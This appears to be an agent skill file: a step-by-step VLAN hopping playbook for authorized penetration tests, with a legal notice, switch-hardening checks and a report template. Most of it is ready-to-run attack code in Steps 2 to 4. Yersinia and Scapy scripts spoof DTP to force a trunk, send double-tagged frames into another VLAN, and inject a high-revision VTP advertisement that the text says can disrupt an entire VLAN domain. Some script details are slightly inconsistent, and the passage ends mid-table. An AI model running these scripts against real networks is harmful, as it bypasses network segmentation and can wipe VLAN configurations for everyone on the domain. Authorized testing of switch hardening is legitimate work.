performing-vlan-hopping-attack

What this skill does

# Performing VLAN Hopping Attack

## When to Use

- Testing the effectiveness of VLAN-based network segmentation during authorized penetration tests
- Validating that switch trunk port configurations prevent unauthorized VLAN access
- Assessing whether 802.1Q tagging and native VLAN configurations resist double-tagging attacks
- Demonstrating to network teams why proper switch hardening is critical for isolation between zones
- Verifying that DTP (Dynamic Trunking Protocol) is disabled on all access ports

**Do not use** on production switches without explicit authorization and change management approval, against critical infrastructure VLANs (SCADA, medical devices) without safety controls, or as a denial-of-service vector.

## Prerequisites

- Written authorization specifying in-scope VLANs and switches for testing
- Physical or virtual access to a switch access port on the target network
- Yersinia, Scapy, and frogger VLAN hopping tools installed on Kali Linux
- Understanding of 802.1Q trunking, DTP, and VLAN tagging at the frame level
- Access to switch CLI for verification of configurations (read-only is sufficient)
- Wireshark for capturing and verifying tagged frames


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1: Enumerate VLAN Configuration

```bash
# Identify the current VLAN assignment of the attacker port
ip link show eth0
cat /proc/net/vlan/config 2>/dev/null

# Use CDP/LLDP to discover switch information
sudo tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether proto 0x88cc' 2>/dev/null
# Or use lldpd
lldpcli show neighbors

# If CDP is enabled, capture CDP frames
sudo tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'

# Use Yersinia to discover DTP and VTP information
sudo yersinia -G &
# Or command line:
sudo yersinia dtp -attack 0 -interface eth0
# This listens for DTP frames to learn trunk negotiation status

# Nmap to identify hosts on other VLANs (if routing exists)
nmap -sn 10.10.10.0/24 10.10.20.0/24 10.10.30.0/24
```

### Step 2: Attempt Switch Spoofing (DTP Attack)

```bash
# Use Yersinia to send DTP frames and negotiate a trunk
sudo yersinia dtp -attack 1 -interface eth0

# This sends DTP desirable frames to convert the access port to a trunk
# If successful, the port becomes a trunk carrying all VLANs

# Alternatively, use Scapy to craft DTP frames
python3 << 'PYEOF'
from scapy.all import *
from scapy.contrib.dtp import *

# Send DTP desirable frame to negotiate trunk
dtp_frame = (
    Ether(dst="01:00:0c:cc:cc:cc", src=get_if_hwaddr("eth0")) /
    LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
    SNAP(OUI=0x00000c, code=0x2004) /
    DTP(tlvlist=[
        DTPDomain(type=0x0001, domain=""),
        DTPStatus(type=0x0002, status=b"\x03"),  # Desirable
        DTPType(type=0x0003, dtptype=b"\xa5"),    # 802.1Q trunk
        DTPNeighbor(type=0x0004, neighbor=get_if_hwaddr("eth0"))
    ])
)

sendp(dtp_frame, iface="eth0", count=10, inter=1)
print("[*] DTP desirable frames sent. Check if trunk is negotiated.")
PYEOF

# If trunk negotiation succeeds, verify by capturing tagged frames
sudo tcpdump -en -i eth0 'vlan' -c 10

# Create VLAN subinterfaces to access other VLANs
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip addr add 10.10.10.99/24 dev eth0.10
sudo ip link set eth0.10 up

sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip addr add 10.10.20.99/24 dev eth0.20
sudo ip link set eth0.20 up

# Verify access to other VLANs
ping -c 3 10.10.10.1
ping -c 3 10.10.20.1
```

### Step 3: Attempt Double Tagging Attack

```bash
# Double tagging works when:
# 1. Attacker is on the native VLAN of the trunk
# 2. Target VLAN is different from the native VLAN
# 3. The switch strips the outer tag and forwards the inner tag

python3 << 'PYEOF'
from scapy.all import *

# Craft double-tagged frame
# Outer tag: Native VLAN (e.g., VLAN 1)
# Inner tag: Target VLAN (e.g., VLAN 20 - server VLAN)
target_ip = "10.10.20.10"
target_mac = "ff:ff:ff:ff:ff:ff"

double_tagged = (
    Ether(dst=target_mac, src=get_if_hwaddr("eth0")) /
    Dot1Q(vlan=1) /       # Outer tag: native VLAN (will be stripped)
    Dot1Q(vlan=20) /      # Inner tag: target VLAN (will be forwarded)
    IP(dst=target_ip, src="10.10.20.99") /
    ICMP(type=8)           # Echo request
)

# Send the double-tagged frame
sendp(double_tagged, iface="eth0", count=5, inter=1)
print("[*] Double-tagged frames sent targeting VLAN 20")
print("[!] Note: Double tagging is unidirectional - no responses expected")
PYEOF

# Use frogger for automated VLAN hopping
# frogger identifies native VLAN and attempts double tagging
sudo frogger

# Verify with Wireshark capture on the target VLAN (if possible)
# On a monitoring port in VLAN 20:
tshark -i eth1 -Y "vlan.id == 20 and icmp" -c 10
```

### Step 4: Test VTP (VLAN Trunking Protocol) Attacks

```bash
# If VTP is in use, attempt to inject a VTP message with higher revision number
# This can overwrite VLAN database across all switches in the domain

python3 << 'PYEOF'
from scapy.all import *

# Craft VTP summary advertisement with high revision number
# WARNING: This can disrupt the entire VLAN domain if successful
vtp_frame = (
    Ether(dst="01:00:0c:cc:cc:cc", src=get_if_hwaddr("eth0")) /
    LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
    SNAP(OUI=0x00000c, code=0x2003) /
    Raw(load=bytes([
        0x02,                    # Version 2
        0x01,                    # Summary advertisement
        0x00,                    # Followers
        0x06,                    # Domain name length
        0x54, 0x45, 0x53, 0x54, # Domain: "TEST"
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0xFF, 0xFF, # High revision number
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, # MD5 digest (zeros for lab)
    ]))
)

# Only send in authorized lab environments
sendp(vtp_frame, iface="eth0", count=1)
print("[*] VTP summary advertisement sent")
PYEOF
```

### Step 5: Verify Switch Configuration Weaknesses

```bash
# On the switch (with read access), check for misconfigurations:

# Check DTP status on access ports (should be nonegotiate)
# show interfaces <interface> switchport
# Expected: Administrative Mode: static access
#           Negotiation of Trunking: Off

# Check native VLAN configuration (should not be VLAN 1)
# show interfaces trunk
# Expected: Native VLAN not matching any user VLAN

# Check VTP mode (should be transparent or off)
# show vtp status
# Expected: VTP Mode: Transparent

# Check unused ports are disabled
# show interfaces status | include disabled

# Verify port security is enabled
# show port-security
```

### Step 6: Document Findings and Remediation

```bash
# Clean up VLAN subinterfaces
sudo ip link del eth0.10 2>/dev/null
sudo ip link del eth0.20 2>/dev/null

# Stop any running attack tools
sudo killall yersinia 2>/dev/null

# Document all test results with timestamps
cat > vlan_hopping_report.txt << 'EOF'
VLAN Hopping Test Results
=========================
Test Date: $(date)
Tester: Security Assessment Team
Authorization: PENTEST-2024-0847

Test 1: DTP Switch Spoofing
  Result: VULNERABLE - Port negotiated trunk in 3 seconds
  Access gained to: VLANs 1, 10, 20, 30, 40

Test 2: Double Tagging
  Result: VULNERABLE - Frames reached VLAN 20 from VLAN 1
  Note: Unidirectional only (no return traffic)

Test 3: VTP Attack
  Result: NOT TESTED - VTP in transparent mode
EOF
```

## Key Concepts

| Term | Definition |
|------|------------|
| **VLAN Hopping** | Layer 2 attack technique that allows an attacker to access traffic on VLANs they are not authorized to reach, bypassing ne